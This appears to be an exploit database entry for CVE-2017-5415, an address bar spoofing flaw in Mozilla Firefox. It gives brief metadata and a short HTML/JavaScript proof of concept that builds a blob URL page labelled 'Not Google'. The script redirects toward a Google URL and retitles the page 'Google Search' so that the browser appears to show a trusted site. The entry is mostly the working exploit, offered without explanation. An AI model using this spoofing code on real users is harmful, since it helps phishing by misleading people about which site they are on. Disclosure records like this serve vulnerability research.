Mozilla Firefox - Address Bar Spoofing
Author: 649 type: local platform: multiple port: date_added: 2018-03-09 date_updated: 2018-03-09 verified: 0 codes: CVE-2017-5415 tags: aliases: screenshot_url: application_url: raw file: 44266.html
<script> location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'})) </script>